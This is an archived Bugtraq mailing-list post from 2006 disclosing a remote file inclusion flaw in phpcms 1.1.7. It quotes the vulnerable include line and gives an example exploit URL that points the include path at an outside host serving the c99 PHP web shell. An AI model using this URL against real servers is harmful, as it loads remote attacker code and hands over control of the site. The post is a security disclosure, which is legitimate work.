bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

phpcms <=- 1.1.7 Remote File Inclusion

from [Zarloule04] [Permanent Link][Original]
To: bugtraq@securityfocus.com
Subject: phpcms <=- 1.1.7 Remote File Inclusion
From: Zarloule04@gmail.com
Date: 24 Dec 2006 23:28:20 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm 
#phpcms <=- 1.1.7 Remote File Inclusion
#Download Source : #http://phpcms.de/files/phpcms_1_1_7.zip
#Found By : b0rizQ
#Greetz : Nuck3r + Crack_Man + Red_Casper + RaChidox + Broken-Proxy + S4mi

_____________________________________________________

File : class.cache_phpcms.php
--Bugs--------------------------------------
include ($PHPCMS_INCLUDEPATH.'/language.'.$DEFAULTS->LANGUAGE );
        if ( $DEFAULTS->STATS == 'on' )


--------------------------------------------
Exmple And Methode Exploit : 

http://www.traget.***/cms/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=http://b0rizq.by.ru/c99.txt?


""""""""""www.b0rizQ.Biz"""""""""""""""""""""
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Cahier de texte V2.2 Bypass general access protection exploit, gmdarkfig
Next by Date:  PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability, xorontr
Previous by Thread:  Cahier de texte V2.2 Bypass general access protection exploit, gmdarkfig
Next by Thread:  Re: phpcms <=- 1.1.7 Remote File Inclusion, Hugo van der Kooij
Indexes:  [Date] [Thread] [Top] [All Lists]